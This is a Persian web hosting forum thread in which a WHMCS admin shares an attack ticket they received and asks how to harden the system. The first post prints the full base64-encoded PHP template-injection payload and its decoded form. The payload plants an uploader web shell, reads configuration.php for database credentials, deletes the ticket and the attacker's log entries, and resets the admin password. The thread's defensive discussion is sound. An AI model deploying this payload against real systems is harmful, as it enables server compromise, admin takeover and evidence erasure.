صفحه 1 از 3 123 آخرینآخرین
نمایش نتایج: از شماره 1 تا 10 , از مجموع 21

موضوع: امنیت whmcs

  1. #1
    کاربر اخراج شده
    تاریخ عضویت
    Nov 2011
    محل سکونت
    رشت
    نوشته ها
    325
    تشکر تشکر کرده 
    160
    تشکر تشکر شده 
    378
    تشکر شده در
    232 پست

    پیش فرض امنیت whmcs

    سلام یه سوالی در مورد امنیت این سیستم داشتم
    الان سیستم من لایسنس دار و آخرین ورژنه و خیلی مسائل رو هم انجام دادم توش
    امروز یه تیکت برام اومد
    {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlDQooIlBEOXdhSEFOQ21WamFHOGdKenhtYjNKdElHRmpkR2x 2 YmowaUlpQnRaWFJvYjJROUluQnZjM1FpSUdWdVkzUjVjR1U5SW 0xMWJIUnBjR0Z5ZEM5bWIzSnRM V1JoZEdFaUlHNWhiV1U5SW5Wd2JHOWhaR1Z5SWlCcFpEMGlkWE JzYjJGa1pYSWlQaWM3RFFwbFky aHZJQ2M4YVc1d2RYUWdkSGx3Wg0KDQpUMGlabWxzWlNJZ2JtRn RaVDBpWm1sc1pTSWdjMmw2WlQw aU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbF BTSnpkV0p0YVhRaUlHbGtQU0pm ZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSn pzTkNtbG1LQ0FrWDFCUFUxUmJK MTkxY0d3blhTQTlQU0FpVlhCcw0KDQpiMkZrSWlBcElIc05DZ2 xwWmloQVkyOXdlU2drWDBaSlRF VlRXeWRtYVd4bEoxMWJKM1J0Y0Y5dVlXMWxKMTBzSUNSZlJrbE 1SVk5iSjJacGJHVW5YVnNuYm1G dFpTZGRLU2tnZXlCbFkyaHZJQ2M4WWo1VmNHeHZZV1FnVTFWTF UwVlRJQ0VoSVR3dllqNDhZbkkN Cg0KK1BHSnlQaWM3SUgwTkNnbGxiSE5sSUhzZ1pXTm9ieUFuUE dJK1ZYQnNiMkZrSUVkQlIwRk1J Q0VoSVR3dllqNDhZbkkrUEdKeVBpYzdJSDBOQ24wTkNqOCsiKT sNCiRta2RpciA9IEBta2RpciAo ImtpbmciLDc1NSk7DQokZm8gPSBmb3Blbigia2luZy9raW5nLn BocCIsInciKTsNCmZ3cml0ZSgk Zm8sJGNvZGUpOw0KJHRleHQ9ZmlsZV9nZXRfY29udGVudHMoIm NvbmZpZ3VyYXRpb24ucGhwIik7 DQokdGV4dD0gc3RyX3JlcGxhY2UoIjw/cGhwIiwgIiIsICR0ZXh0KTsNCiR0ZXh0PSBzdHJfcmVw bGFjZSgiPD8iLCAiIiwgJHRleHQpOw0KJHRleHQ9IHN0cl9yZX BsYWNlKCI/PiIsICIiLCAkdGV4 dCk7DQpldmFsKCR0ZXh0KTsNCiRkYj1teXNxbF9jb25uZWN0KC RkYl9ob3N0LCRkYl91c2VybmFt ZSwkZGJfcGFzc3dvcmQpb3IgZGllKCJDYW4ndCBvcGVuIGNvbm 5lY3Rpb24gdG8gTXlTUUwiKTsN Cm15c3FsX3NlbGVjdF9kYigkZGJfbmFtZSkgb3IgZGllKCJDYW 4ndCBzZWxlY3QgZGF0YWJhc2Ui KTsNCiRkZWxldGUgPSJERUxFVEUgZnJvbSB0Ymx0aWNrZXRzIF dIRVJFIHRpdGxlIGxpa2UgMHgy NTdCNzA2ODcwN0QyNTsiOw0KbXlzcWxfcXVlcnkoJGRlbGV0ZS k7DQokZGVsZXRlMiA9IkRFTEVU RSBmcm9tIHRibGFjdGl2aXR5bG9nICBXSEVSRSBpcGFkZHI9Jy IuJF9TRVJWRVJbJ1JFTU9URV9B RERSJ10uIic7IjsNCm15c3FsX3F1ZXJ5KCRkZWxldGUyKTsNCi RzYSA9IG15c3FsX3F1ZXJ5KCJV UERBVEUgYHRibGFkbWluc2AgU0VUIGBwYXNzd29yZGAgPSAnND I5N2Y0NGIxMzk1NTIzNTI0NWIy NDk3Mzk5ZDdhOTMnIFdIRVJFIGB0YmxhZG1pbnNgLmBpZGAgPT EgTElNSVQgMSA7Iik7DQokc2Ex ID0gbXlzcWxfcXVlcnkoIlVQREFURSBgdGJsYWRtaW5zYCBTRV QgYGFkbWluYCA9ICdhZG1pbicg V0hFUkUgYHRibGFkbWluc2AuYGlkYCA9MSBMSU1JVCAxIDsiKT s='));{/php}
    معنیشم میشه
    $mkdir = @mkdir ("king",755);
    $fo = fopen("king/king.php","w");
    fwrite($fo,$code);
    $text=file_get_contents("configuration.php");
    $text= str_replace("<?php", "", $text);
    $text= str_replace("<?", "", $text);
    $text= str_replace("?>", "", $text);
    eval($text);
    $db=mysql_connect($db_host,$db_username,$db_passwo rd)or die("Can't open connection to MySQL");
    mysql_select_db($db_name) or die("Can't select database");
    $delete ="DELETE from tbltickets WHERE title like 0x257B7068707D25;";
    mysql_query($delete);
    $delete2 ="DELETE from tblactivitylog WHERE ipaddr='".$_SERVER['REMOTE_ADDR']."';";
    mysql_query($delete2);
    $sa = mysql_query("UPDATE `tbladmins` SET `password` = '4297f44b13955235245b2497399d7a93' WHERE `tbladmins`.`id` =1 LIMIT 1 ;");
    $sa1 = mysql_query("UPDATE `tbladmins` SET `admin` = 'admin' WHERE `tbladmins`.`id` =1 LIMIT 1 ;");
    الان سوال من اینه روز به روز داره این نوع هک تغییر میکنه
    خدارو شکر کاری نمیتونن بکنن
    اما خب سوال من اینه چه جوری میتونم نام فایل دیتابیس رو عوض کنم
    طوری که اصلا دیگه به صورت پیش فرض configuration.php نباشه ادمین رو هم همین طور
    یه جورایی تیبل هارو تغییر نام بدم که امنیتش دیگه بره بسیار بالاتر

    ---------- Post added at 01:35 PM ---------- Previous post was at 01:11 PM ----------

    راهنمای نمیکنید؟
    اکای خودم تا شب بررسی میکنم همین جا برا شمام میذارم

  2. # ADS




     

  3. #2
    کاربر اخراج شده
    تاریخ عضویت
    Nov 2011
    محل سکونت
    اردبیل
    نوشته ها
    287
    تشکر تشکر کرده 
    145
    تشکر تشکر شده 
    469
    تشکر شده در
    353 پست

    پیش فرض پاسخ : امنیت whmcs

    این تاپیک رو مطالعه کنید
    شاید بتونه کمک کنه
    http://www.webhostingtalk.ir/f177/37...tml#post343072

  4. #3
    کاربر اخراج شده
    تاریخ عضویت
    Nov 2011
    محل سکونت
    رشت
    نوشته ها
    325
    تشکر تشکر کرده 
    160
    تشکر تشکر شده 
    378
    تشکر شده در
    232 پست

    پیش فرض پاسخ : امنیت whmcs

    ممنونم میگم امنیت رو به بالاترین حد رسوندم و این آموزش شمارو من بهترشو خودم تو این انجمن نوشتم
    مشکل من تغییر نام ادمین و کانفیگ و برخی تیبل هاست
    که دیگه فکر نکنم بعد از این کار عمرا هک بشه

  5. تعداد تشکر ها از maryam1 به دلیل پست مفید


  6. #4
    عضو انجمن Mohammad_reza آواتار ها
    تاریخ عضویت
    Mar 2011
    محل سکونت
    کرج
    نوشته ها
    650
    تشکر تشکر کرده 
    1,101
    تشکر تشکر شده 
    1,391
    تشکر شده در
    915 پست

    پیش فرض پاسخ : امنیت whmcs

    اینم یک هک جدیده و خلاقانه هم هست!
    یک کدی دوستان داده بودند که داخل configuration.php قرار میدادیم و دیگه تیکت هایی که داخلش از php استفاده شده بود ، پذیرفته نمیشد! فکر می کنم اون کد کلاً مشکل تیکت رو برطرف کنه ...
    ✦✦ سپید وب - طراحی وب سایت و قالب وردپرس ✦✦

    ایمیل: info (a) sepidweb (dot) com


  7. تعداد تشکر ها از Mohammad_reza به دلیل پست مفید


  8. #5
    کاربر اخراج شده
    تاریخ عضویت
    Nov 2011
    محل سکونت
    رشت
    نوشته ها
    325
    تشکر تشکر کرده 
    160
    تشکر تشکر شده 
    378
    تشکر شده در
    232 پست

    پیش فرض پاسخ : امنیت whmcs

    این تیکت ندادا از طریق ارتباط با ما فرستاد
    جالبه آدرس ایمیل و آیپیشم در اختیار قرار داد مال کشور ترکیه بود

    ---------- Post added at 01:52 PM ---------- Previous post was at 01:51 PM ----------

    بله خیلی خلاقانست برا همین میخوام تیبل ها رو تغییر نام بدم تا طرف نتونه دستور تغییر رمز عبور ادمین رو بفرسته واسه تیبل ادمین

  9. #6
    کاربر اخراج شده
    تاریخ عضویت
    Nov 2011
    محل سکونت
    اردبیل
    نوشته ها
    287
    تشکر تشکر کرده 
    145
    تشکر تشکر شده 
    469
    تشکر شده در
    353 پست

    پیش فرض پاسخ : امنیت whmcs

    شما اگه راهکار بالابردنش رو میدونین تو همین تاپیک بزارین تا ما هم استفاده کنیم
    ممنون

  10. #7
    کاربر اخراج شده
    تاریخ عضویت
    Nov 2011
    محل سکونت
    رشت
    نوشته ها
    325
    تشکر تشکر کرده 
    160
    تشکر تشکر شده 
    378
    تشکر شده در
    232 پست

    پیش فرض پاسخ : امنیت whmcs

    چشم ایشالا تا شب یه بلایی سرش میارم
    برا بالا بردم امنیت هم میتونید
    http://www.webhostingtalk.ir/f178/36259/
    یه سری کارای دیگم هست مثل آپگرید به ورژن آخر
    اما در مورد این هک به نظر نیازه نم فایل کانفیگ ادیت بشه تا هکر اصلا ندونه اسم فایل کانفیگ چیه که بخواد فراخوانیش کنه

  11. #8
    عضو انجمن
    تاریخ عضویت
    Nov 2011
    نوشته ها
    223
    تشکر تشکر کرده 
    627
    تشکر تشکر شده 
    385
    تشکر شده در
    246 پست

    پیش فرض پاسخ : امنیت whmcs

    دوستان عزیز
    شما یک سوال رو جواب بدید که توی whmcs از bbcode استفاده شده؟ تنظیمات مربوط به bbcode داره؟
    اگر جواب مثبت هست و تنظیماتی داره با استفاده از اون تنظیمات میشه جلوی php inject رو گرفت.
    تغییر نام گروه طراح و توسعه ...

  12. #9
    کاربر اخراج شده
    تاریخ عضویت
    Nov 2011
    محل سکونت
    رشت
    نوشته ها
    325
    تشکر تشکر کرده 
    160
    تشکر تشکر شده 
    378
    تشکر شده در
    232 پست

    پیش فرض پاسخ : امنیت whmcs

    ایشالا تا شب تموم یافته هامو میذارم اینجا
    دست به دست هم نهیم و whmcs خود را کنیم آباد

  13. #10
    کاربر اخراج شده
    تاریخ عضویت
    Nov 2011
    محل سکونت
    اردبیل
    نوشته ها
    287
    تشکر تشکر کرده 
    145
    تشکر تشکر شده 
    469
    تشکر شده در
    353 پست

    پیش فرض پاسخ : امنیت whmcs

    نقل قول نوشته اصلی توسط maryam1 نمایش پست ها
    ایشالا تا شب تموم یافته هامو میذارم اینجا
    دست به دست هم نهیم و whmcs خود را کنیم آباد
    دست در دست هم نهیم و whmcs خود را کنیم امن و امان

صفحه 1 از 3 123 آخرینآخرین

اطلاعات موضوع

کاربرانی که در حال مشاهده این موضوع هستند

در حال حاضر 1 کاربر در حال مشاهده این موضوع است. (0 کاربران و 1 مهمان ها)

موضوعات مشابه

  1. پاسخ ها: 6
    آخرين نوشته: November 22nd, 2017, 13:39
  2. [ کاربردی ترین ماژول whmcs ] ماژول مدیریت منو و محتوای whmcs
    توسط lizard.tiny در انجمن فروش انواع ماژول،پلاگین،قالب،افزونه،امکانات سفارشی
    پاسخ ها: 3
    آخرين نوشته: March 18th, 2017, 13:24

مجوز های ارسال و ویرایش

  • شما نمیتوانید موضوع جدیدی ارسال کنید
  • شما امکان ارسال پاسخ را ندارید
  • شما نمیتوانید فایل پیوست کنید.
  • شما نمیتوانید پست های خود را ویرایش کنید
  •